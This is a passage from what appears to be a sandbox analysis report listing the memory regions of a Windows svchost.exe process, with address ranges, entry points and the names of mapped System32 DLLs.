	        filename = ""

Region:
	              id = 2794
	        start_va = 0x7ff78c0f0000
	          end_va = 0x7ff78c112fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff78c0f0000"
	        filename = ""

Region:
	              id = 2795
	        start_va = 0x7ff78c7c0000
	          end_va = 0x7ff78c7ccfff
	       monitored = 0
	     entry_point = 0x7ff78c7c3980
	     region_type = mapped_file
	            name = "svchost.exe"
	        filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")

Region:
	              id = 2796
	        start_va = 0x7ff941290000
	          end_va = 0x7ff9412a6fff
	       monitored = 0
	     entry_point = 0x7ff941297520
	     region_type = mapped_file
	            name = "usoapi.dll"
	        filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll")

Region:
	              id = 2797
	        start_va = 0x7ff9412b0000
	          end_va = 0x7ff941384fff
	       monitored = 0
	     entry_point = 0x7ff9412ccf80
	     region_type = mapped_file
	            name = "wuapi.dll"
	        filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")

Region:
	              id = 2798
	        start_va = 0x7ff941440000
	          end_va = 0x7ff9416effff
	       monitored = 0
	     entry_point = 0x7ff941441cf0
	     region_type = mapped_file
	            name = "netshell.dll"
	        filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")

Region:
	              id = 2799
	        start_va = 0x7ff941820000
	          end_va = 0x7ff941863fff
	       monitored = 0
	     entry_point = 0x7ff9418483e0
	     region_type = mapped_file
	            name = "updatehandlers.dll"
	        filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll")

Region:
	              id = 2800
	        start_va = 0x7ff942770000
	          end_va = 0x7ff9427d6fff
	       monitored = 0
	     entry_point = 0x7ff94277b160
	     region_type = mapped_file
	            name = "upnp.dll"
	        filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")

Region:
	              id = 2801
	        start_va = 0x7ff9427e0000
	          end_va = 0x7ff942801fff
	       monitored = 0
	     entry_point = 0x7ff9427f2540
	     region_type = mapped_file
	            name = "updatepolicy.dll"
	        filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll")

Region:
	              id = 2802
	        start_va = 0x7ff942990000
	          end_va = 0x7ff9429ecfff
	       monitored = 0
	     entry_point = 0x7ff9429be510
	     region_type = mapped_file
	            name = "usocore.dll"
	        filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll")

Region:
	              id = 2803
	        start_va = 0x7ff942d80000
	          end_va = 0x7ff942e8efff
	       monitored = 0
	     entry_point = 0x7ff942dbc010
	     region_type = mapped_file
	            name = "dosvc.dll"
	        filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll")

Region:
	              id = 2804
	        start_va = 0x7ff943810000
	          end_va = 0x7ff943827fff
	       monitored = 0
	     entry_point = 0x7ff94381b850
	     region_type = mapped_file
	            name = "dmcmnutils.dll"
	        filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll")

Region:
	              id = 2805
	        start_va = 0x7ff944120000
	          end_va = 0x7ff944129fff
	       monitored = 0
	     entry_point = 0x7ff944121350
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 2806
	        start_va = 0x7ff944150000
	          end_va = 0x7ff94426cfff
	       monitored = 0
	     entry_point = 0x7ff94417fe60
	     region_type = mapped_file
	            name = "qmgr.dll"
	        filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")

Region:
	              id = 2807
	        start_va = 0x7ff9459c0000
	          end_va = 0x7ff9459d3fff
	       monitored = 0
	     entry_point = 0x7ff9459c3710
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")

Region:
	              id = 2808
	        start_va = 0x7ff945a70000
	          end_va = 0x7ff945a8dfff
	       monitored = 0
	     entry_point = 0x7ff945a7ef80
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")

Region:
	              id = 2809
	        start_va = 0x7ff94a200000
	          end_va = 0x7ff94a210fff
	       monitored = 0
	     entry_point = 0x7ff94a207480
	     region_type = mapped_file
	            name = "tetheringclient.dll"
	        filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll")

Region:
	              id = 2810
	        start_va = 0x7ff94a220000
	          end_va = 0x7ff94a2a3fff
	       monitored = 0
	     entry_point = 0x7ff94a238d50
	     region_type = mapped_file
	            name = "wbemess.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")

Region:
	              id = 2811
	        start_va = 0x7ff94a380000
	          end_va = 0x7ff94a395fff
	       monitored = 0
	     entry_point = 0x7ff94a3855e0
	     region_type = mapped_file
	            name = "ncobjapi.dll"
	        filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")

Region:
	              id = 2812
	        start_va = 0x7ff94a3a0000
	          end_va = 0x7ff94a475fff
	       monitored = 0
	     entry_point = 0x7ff94a3ca800
	     region_type = mapped_file
	            name = "wmiprvsd.dll"
	        filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")

Region:
	              id = 2813
	        start_va = 0x7ff94a480000
	          end_va = 0x7ff94a4fffff
	       monitored = 0
	     entry_point = 0x7ff94a4ad280
	     region_type = mapped_file
	            name = "webio.dll"
	        filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")

Region:
	              id = 2814
	        start_va = 0x7ff94a500000
	          end_va = 0x7ff94a563fff
	       monitored = 0
	     entry_point = 0x7ff94a51bed0
	     region_type = mapped_file
	            name = "repdrvfs.dll"
	        filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")

Region:
	              id = 2815
	        start_va = 0x7ff94a570000
	          end_va = 0x7ff94a594fff
	       monitored = 0
	     entry_point = 0x7ff94a579900
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 2816
	        start_va = 0x7ff94a5a0000
	          end_va = 0x7ff94a5b3fff
	       monitored = 0
	     entry_point = 0x7ff94a5a1800
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 2817
	        start_va = 0x7ff94a5c0000
	          end_va = 0x7ff94a6b5fff
	       monitored = 0
	     entry_point = 0x7ff94a5f9590
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 2818
	        start_va = 0x7ff94a6c0000
	          end_va = 0x7ff94a733fff
	       monitored = 0
	     entry_point = 0x7ff94a6d5eb0
	     region_type = mapped_file
	            name = "esscli.dll"
	        filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")

Region:
	              id = 2819
	        start_va = 0x7ff94a740000
	          end_va = 0x7ff94a876fff
	       monitored = 0
	     entry_point = 0x7ff94a780480
	     region_type = mapped_file
	            name = "wbemcore.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")

Region:
	              id = 2820
	        start_va = 0x7ff94aa40000
	          end_va = 0x7ff94aa75fff
	       monitored = 0
	     entry_point = 0x7ff94aa427f0
	     region_type = mapped_file
	            name = "windows.networking.hostname.dll"
	        filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll")

Region:
	              id = 2821
	        start_va = 0x7ff94ca60000
	          end_va = 0x7ff94ca75fff
	       monitored = 0
	     entry_point = 0x7ff94ca61d50
	     region_type = mapped_file
	            name = "wwapi.dll"
	        filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")

Region:
	              id = 2822
	        start_va = 0x7ff94ca80000
	          end_va = 0x7ff94ca90fff
	       monitored = 0
	     entry_point = 0x7ff94ca82fc0
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 2823
	        start_va = 0x7ff94caa0000
	          end_va = 0x7ff94cabdfff
	       monitored = 0
	     entry_point = 0x7ff94caa3a40
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")

Region:
	              id = 2824
	        start_va = 0x7ff94cac0000
	          end_va = 0x7ff94cb41fff
	       monitored = 0
	     entry_point = 0x7ff94cac2a10
	     region_type = mapped_file
	            name = "hnetcfg.dll"
	        filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")

Region:
	              id = 2825
	        start_va = 0x7ff94d170000
	          end_va = 0x7ff94d185fff
	       monitored = 0
	     entry_point = 0x7ff94d171af0
	     region_type = mapped_file
	            name = "napinsp.dll"
	        filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")

Region:
	              id = 2826
	        start_va = 0x7ff94d190000
	          end_va = 0x7ff94d1a9fff
	       monitored = 0
	     entry_point = 0x7ff94d192330
	     region_type = mapped_file
	            name = "pnrpnsp.dll"
	        filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")

Region:
	              id = 2827
	        start_va = 0x7ff94d1b0000
	          end_va = 0x7ff94d1bcfff
	       monitored = 0
	     entry_point = 0x7ff94d1b1420
	     region_type = mapped_file
	            name = "winrnr.dll"
	        filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")

Region:
	              id = 2828
	        start_va = 0x7ff94d400000
	          end_va = 0x7ff94d40bfff
	       monitored = 0
	     entry_point = 0x7ff94d4035c0
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 2829
	        start_va = 0x7ff94d460000
	          end_va = 0x7ff94d49ffff
	       monitored = 0
	     entry_point = 0x7ff94d46cbe0
	     region_type = mapped_file
	            name = "adsldpc.dll"
	        filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll")

Region:
	              id = 2830
	        start_va = 0x7ff94d4a0000
	          end_va = 0x7ff94d4e6fff
	       monitored = 0
	     entry_point = 0x7ff94d4a1d10
	     region_type = mapped_file
	            name = "activeds.dll"
	        filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll")

Region:
	              id = 2831
	        start_va = 0x7ff94d4f0000
	          end_va = 0x7ff94d531fff
	       monitored = 0
	     entry_point = 0x7ff94d4f3670
	     region_type = mapped_file
	            name = "wdscore.dll"
	        filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")

Region:
	              id = 2832
	        start_va = 0x7ff94d540000
	          end_va = 0x7ff94d57ffff
	       monitored = 0
	     entry_point = 0x7ff94d556c60
	     region_type = mapped_file
	            name = "netprofm.dll"
	        filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")

Region:
	              id = 2833
	        start_va = 0x7ff94d580000
	          end_va = 0x7ff94d59efff
	       monitored = 0
	     entry_point = 0x7ff94d5837e0
	     region_type = mapped_file
	            name = "netsetupapi.dll"
	        filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll")

Region:
	              id = 2834
	        start_va = 0x7ff94d5a0000
	          end_va = 0x7ff94d618fff
	       monitored = 0
	     entry_point = 0x7ff94d5a76a0
	     region_type = mapped_file
	            name = "netsetupshim.dll"
	        filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll")

Region:
	              id = 2835
	        start_va = 0x7ff94d6b0000
	          end_va = 0x7ff94d6c7fff
	       monitored = 0
	     entry_point = 0x7ff94d6b2000
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")

Region:
	              id = 2836
	        start_va = 0x7ff94d6d0000
	          end_va = 0x7ff94d851fff
	       monitored = 0
	     entry_point = 0x7ff94d6e82a0
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")

Region:
	              id = 2837
	        start_va = 0x7ff94d860000
	          end_va = 0x7ff94d877fff
	       monitored = 0
	     entry_point = 0x7ff94d864e10
	     region_type = mapped_file
	            name = "adhsvc.dll"
	        filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")

Region:
	              id = 2838
	        start_va = 0x7ff94d880000
	          end_va = 0x7ff94d8a4fff
	       monitored = 0
	     entry_point = 0x7ff94d885ca0
	     region_type = mapped_file
	            name = "httpprxm.dll"
	        filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")

Region:
	              id = 2839
	        start_va = 0x7ff94d8b0000
	          end_va = 0x7ff94d8f0fff
	       monitored = 0
	     entry_point = 0x7ff94d8b3750
	     region_type = mapped_file
	            name = "sqmapi.dll"
	        filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")

Region:
	              id = 2840
	        start_va = 0x7ff94d900000
	          end_va = 0x7ff94d9f2fff
	       monitored = 0
	     entry_point = 0x7ff94d925d80
	     region_type = mapped_file
	            name = "iphlpsvc.dll"
	        filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")

Region:
	              id = 2841
	        start_va = 0x7ff94da00000
	          end_va = 0x7ff94daa2fff
	       monitored = 0
	     entry_point = 0x7ff94da02c10
	     region_type = mapped_file
	            name = "clusapi.dll"
	        filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")

Region:
	              id = 2842
	        start_va = 0x7ff94dab0000
	          end_va = 0x7ff94db01fff
	       monitored = 0
	     entry_point = 0x7ff94dab5770
	     region_type = mapped_file
	            name = "resutils.dll"
	        filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")

Region:
	              id = 2843
	        start_va = 0x7ff94db10000
	          end_va = 0x7ff94db3dfff
	       monitored = 1
	     entry_point = 0x7ff94db12300
	     region_type = mapped_file
	            name = "wmidcom.dll"
	        filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")

Region:
	              id = 2844
	        start_va = 0x7ff94db40000
	          end_va = 0x7ff94db9dfff
	       monitored = 0
	     entry_point = 0x7ff94db45080
	     region_type = mapped_file
	            name = "miutils.dll"
	        filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")

Region:
	              id = 2845
	        start_va = 0x7ff94dba0000
	          end_va = 0x7ff94dbbffff
	       monitored = 0
	     entry_point = 0x7ff94dba1f50
	     region_type = mapped_file
	            name = "mi.dll"
	        filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")

Region:
	              id = 2846
	        start_va = 0x7ff94dbc0000
	          end_va = 0x7ff94dbc8fff
	       monitored = 0
	     entry_point = 0x7ff94dbc18f0
	     region_type = mapped_file
	            name = "sscoreext.dll"
	        filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")

Region:
	              id = 2847
	        start_va = 0x7ff94dbd0000
	          end_va = 0x7ff94dbe0fff
	       monitored = 0
	     entry_point = 0x7ff94dbd1d30
	     region_type = mapped_file
	            name = "sscore.dll"
	        filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")

Region:
	              id = 2848
	        start_va = 0x7ff94e2a0000
	          end_va = 0x7ff94e2ebfff
	       monitored = 0
	     entry_point = 0x7ff94e2b5310
	     region_type = mapped_file
	            name = "srvsvc.dll"
	        filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")

Region:
	              id = 2849
	        start_va = 0x7ff94e2f0000
	          end_va = 0x7ff94e36efff
	       monitored = 0
	     entry_point = 0x7ff94e307110
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 2850
	        start_va = 0x7ff94e370000
	          end_va = 0x7ff94e3abfff
	       monitored = 0
	     entry_point = 0x7ff94e376aa0
	     region_type = mapped_file
	            name = "wmisvc.dll"
	        filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")

Region:
	              id = 2851
	        start_va = 0x7ff94e480000
	          end_va = 0x7ff94e4b4fff
	       monitored = 0
	     entry_point = 0x7ff94e48a270
	     region_type = mapped_file
	            name = "fwpolicyiomgr.dll"
	        filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll")

Region:
	              id = 2852
	        start_va = 0x7ff94ea80000
	          end_va = 0x7ff94ea90fff
	       monitored = 0
	     entry_point = 0x7ff94ea828d0
	     region_type = mapped_file
	            name = "credentialmigrationhandler.dll"
	        filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")

Region:
	              id = 2853
	        start_va = 0x7ff94eaa0000
	          end_va = 0x7ff94ead1fff
	       monitored = 0
	     entry_point = 0x7ff94eaab0c0
	     region_type = mapped_file
	            name = "shacct.dll"
	        filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")

Region:
	              id = 2854
	        start_va = 0x7ff94ecf0000
	          end_va = 0x7ff94ed07fff
	       monitored = 0
	     entry_point = 0x7ff94ecf1b10
	     region_type = mapped_file
	            name = "locationframeworkinternalps.dll"
	        filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll")

Region:
	              id = 2855
	        start_va = 0x7ff94ed10000
	          end_va = 0x7ff94ed19fff
	       monitored = 0
	     entry_point = 0x7ff94ed114c0
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")

Region:
	              id = 2856
	        start_va = 0x7ff94ee00000
	          end_va = 0x7ff94ee08fff
	       monitored = 0
	     entry_point = 0x7ff94ee021d0
	     region_type = mapped_file
	            name = "httpprxc.dll"
	        filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll")

Region:
	              id = 2857
	        start_va = 0x7ff94ef90000
	          end_va = 0x7ff94ef9ffff
	       monitored = 0
	     entry_point = 0x7ff94ef91700
	     region_type = mapped_file
	            name = "proximityservicepal.dll"
	        filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")

Region:
	              id = 2858
	        start_va = 0x7ff94efa0000
	          end_va = 0x7ff94efa8fff
	       monitored = 0
	     entry_point = 0x7ff94efa1ed0
	     region_type = mapped_file
	            name = "proximitycommonpal.dll"
	        filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")

Region:
	              id = 2859
	        start_va = 0x7ff94efb0000
	          end_va = 0x7ff94efdcfff
	       monitored = 0
	     entry_point = 0x7ff94efb2290
	     region_type = mapped_file
	            name = "proximitycommon.dll"
	        filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")

Region:
	              id = 2860
	        start_va = 0x7ff94efe0000
	          end_va = 0x7ff94f031fff
	       monitored = 0
	     entry_point = 0x7ff94efe38e0
	     region_type = mapped_file
	            name = "proximityservice.dll"
	        filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")

Region:
	              id = 2861
	        start_va = 0x7ff94f0a0000
	          end_va = 0x7ff94f0b4fff
	       monitored = 0
	     entry_point = 0x7ff94f0a2dc0
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")

Region:
	              id = 2862
	        start_va = 0x7ff94fa70000
	          end_va = 0x7ff94fa81fff
	       monitored = 0
	     entry_point = 0x7ff94fa73580
	     region_type = mapped_file
	            name = "cscapi.dll"
	        filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")

Region:
	              id = 2863
	        start_va = 0x7ff94fb00000
	          end_va = 0x7ff94fb1afff
	       monitored = 0
	     entry_point = 0x7ff94fb01040
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")

Region:
	              id = 2864
	        start_va = 0x7ff94fb20000
	          end_va = 0x7ff94fb2dfff
	       monitored = 0
	     entry_point = 0x7ff94fb21460
	     region_type = mapped_file
	            name = "npmproxy.dll"
	        filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")

Region:
	              id = 2865
	        start_va = 0x7ff94fb50000
	          end_va = 0x7ff94fbe9fff
	       monitored = 0
	     entry_point = 0x7ff94fb6ada0
	     region_type = mapped_file
	            name = "shsvcs.dll"
	        filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")

Region:
	              id = 2866
	        start_va = 0x7ff94fc80000
	          end_va = 0x7ff94fc8bfff
	       monitored = 0
	     entry_point = 0x7ff94fc82830
	     region_type = mapped_file
	            name = "bi.dll"
	        filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")

Region:
	              id = 2867
	        start_va = 0x7ff94fc90000
	          end_va = 0x7ff94fca4fff
	       monitored = 0
	     entry_point = 0x7ff94fc93460
	     region_type = mapped_file
	            name = "ssdpapi.dll"
	        filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")

Region:
	              id = 2868
	        start_va = 0x7ff94fde0000
	          end_va = 0x7ff94fe25fff
	       monitored = 0
	     entry_point = 0x7ff94fde79a0
	     region_type = mapped_file
	            name = "adsldp.dll"
	        filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll")

Region:
	              id = 2869
	        start_va = 0x7ff94fe30000
	          end_va = 0x7ff94fe96fff
	       monitored = 0
	     entry_point = 0x7ff94fe363e0
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")

Region:
	              id = 2870
	        start_va = 0x7ff94fef0000
	          end_va = 0x7ff94fefafff
	       monitored = 0
	     entry_point = 0x7ff94fef1d30
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")

Region:
	              id = 2871
	        start_va = 0x7ff94ff60000
	          end_va = 0x7ff95000dfff
	       monitored = 0
	     entry_point = 0x7ff94ff780c0
	     region_type = mapped_file
	            name = "windows.networking.connectivity.dll"
	        filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")

Region:
	              id = 2872
	        start_va = 0x7ff950010000
	          end_va = 0x7ff950021fff
	       monitored = 0
	     entry_point = 0x7ff950019260
	     region_type = mapped_file
	            name = "rilproxy.dll"
	        filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")

Region:
	              id = 2873
	        start_va = 0x7ff950030000
	          end_va = 0x7ff9500e0fff
	       monitored = 0
	     entry_point = 0x7ff9500a88b0
	     region_type = mapped_file
	            name = "cellularapi.dll"
	        filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")

Region:
	              id = 2874
	        start_va = 0x7ff9500f0000
	          end_va = 0x7ff9501affff
	       monitored = 0
	     entry_point = 0x7ff95011fd20
	     region_type = mapped_file
	            name = "fveapi.dll"
	        filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")

Region:
	              id = 2875
	        start_va = 0x7ff9501b0000
	          end_va = 0x7ff9501d4fff
	       monitored = 0
	     entry_point = 0x7ff9501c2f20
	     region_type = mapped_file
	            name = "wificonnapi.dll"
	        filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")

Region:
	              id = 2876
	        start_va = 0x7ff9501e0000
	          end_va = 0x7ff9501f0fff
	       monitored = 0
	     entry_point = 0x7ff9501e7ea0
	     region_type = mapped_file
	            name = "dcpapi.dll"
	        filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")

Region:
	              id = 2877
	        start_va = 0x7ff950260000
	          end_va = 0x7ff950279fff
	       monitored = 0
	     entry_point = 0x7ff950262430
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")

Region:
	              id = 2878
	        start_va = 0x7ff950280000
	          end_va = 0x7ff950295fff
	       monitored = 0
	     entry_point = 0x7ff9502819f0
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")

Region:
	              id = 2879
	        start_va = 0x7ff9502e0000
	          end_va = 0x7ff9502f9fff
	       monitored = 0
	     entry_point = 0x7ff9502e2cf0
	     region_type = mapped_file
	            name = "locationpelegacywinlocation.dll"
	        filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")

Region:
	              id = 2880
	        start_va = 0x7ff950300000
	          end_va = 0x7ff950354fff
	       monitored = 0
	     entry_point = 0x7ff950303fb0
	     region_type = mapped_file
	            name = "policymanager.dll"
	        filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")

Region:
	              id = 2881
	        start_va = 0x7ff950360000
	          end_va = 0x7ff950396fff
	       monitored = 0
	     entry_point = 0x7ff950366020
	     region_type = mapped_file
	            name = "gnssadapter.dll"
	        filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")

Region:
	              id = 2882
	        start_va = 0x7ff9503a0000
	          end_va = 0x7ff9503bffff
	       monitored = 0
	     entry_point = 0x7ff9503a39a0
	     region_type = mapped_file
	            name = "locationwinpalmisc.dll"
	        filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")

Region:
	              id = 2883
	        start_va = 0x7ff9503c0000
	          end_va = 0x7ff9503f7fff
	       monitored = 0
	     entry_point = 0x7ff9503d8cc0
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 2884
	        start_va = 0x7ff9504a0000
	          end_va = 0x7ff9504e0fff
	       monitored = 0
	     entry_point = 0x7ff9504a4840
	     region_type = mapped_file
	            name = "usermgrproxy.dll"
	        filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")

Region:
	              id = 2885
	        start_va = 0x7ff9505b0000
	          end_va = 0x7ff9505ccfff
	       monitored = 0
	     entry_point = 0x7ff9505b4f60
	     region_type = mapped_file
	            name = "appinfo.dll"
	        filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")

Region:
	              id = 2886
	        start_va = 0x7ff9505d0000
	          end_va = 0x7ff9505dbfff
	       monitored = 0
	     entry_point = 0x7ff9505d14d0
	     region_type = mapped_file
	            name = "locationframeworkps.dll"
	        filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")

Region:
	              id = 2887
	        start_va = 0x7ff9506e0000
	          end_va = 0x7ff9506f3fff
	       monitored = 0
	     entry_point = 0x7ff9506e2d50
	     region_type = mapped_file
	            name = "rtutils.dll"
